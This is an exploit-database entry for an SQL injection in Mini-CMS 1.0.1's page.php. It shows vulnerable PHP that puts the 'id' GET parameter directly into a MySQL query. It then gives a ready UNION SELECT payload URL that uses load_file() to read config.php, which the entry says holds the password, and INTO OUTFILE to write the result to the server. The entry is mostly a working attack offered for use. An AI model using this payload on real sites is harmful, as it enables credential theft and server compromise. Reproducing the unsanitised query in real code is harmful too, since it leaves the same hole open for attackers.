Mini-CMS 1.0.1 (page.php id) SQL Injection Vulnerability

2009-08-10T00:00:00
ID 1337DAY-ID-5640
Type zdt
Reporter Ins3t
Modified 2009-08-10T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ========================================================
Mini-CMS 1.0.1 (page.php id) SQL Injection Vulnerability
========================================================


[+]--------------------------------------------------------------------------------------------------------------------[+]
[+]--------------------------------------------[Mini-CMS 1.0.1 SQL inlection]------------------------------------------[+]  
[+]--------------------------------------------------------------------------------------------------------------------[+]

-[INFO]----------------------------------------------------------------------------------------------------------------[+]
[+] Title:Mini-CMS 1.0.1 SQL inlection
[+] Autor: Ins3t
[+] Date:08.08.2009
[+]--------------------------------------------------------------------------------------------------------------------[+]

-[BUG INFO]------------------------------------------------------------------------------------------------------------[+]
[+] The vulnerability occurs due to insufficient filtering transferred database parameters. Password is not in the 
database, and in the config.php file.
[+] Conditions: magic_quotes_gpc = Off | full patch of file config.php
[+] Code vulnerable functions:

[+]-------------------------------------------------[CODE]--------------------------------------------------------------[+]
<?php
$id = $_GET['id'];
database_connect();
$query = "SELECT * from content
          WHERE id = $id";                      <------(BUG)
$error = mysql_error();
if (!$result = mysql_query($query)) {
    print "$error";
        exit;
        }

while($row = mysql_fetch_object($result)){
  $content = $row->text;
  print("$content");
        }
?>
[+]------------------------------------------------[/CODE]--------------------------------------------------------------[+]

[+] Exploit: 

[+]-------------------------------------------------[CODE]--------------------------------------------------------------[+]

http://localhost/page.php?id=-1+union+select+1,2,3,4,load_file('[FULL_PATCH_OF_FILE_CONFIG.PHP]'),6,7,8,9+into+outfile+'[FULL_PATCH]'--+

[+]------------------------------------------------[/CODE]--------------------------------------------------------------[+]




#  0day.today [2018-03-19]  #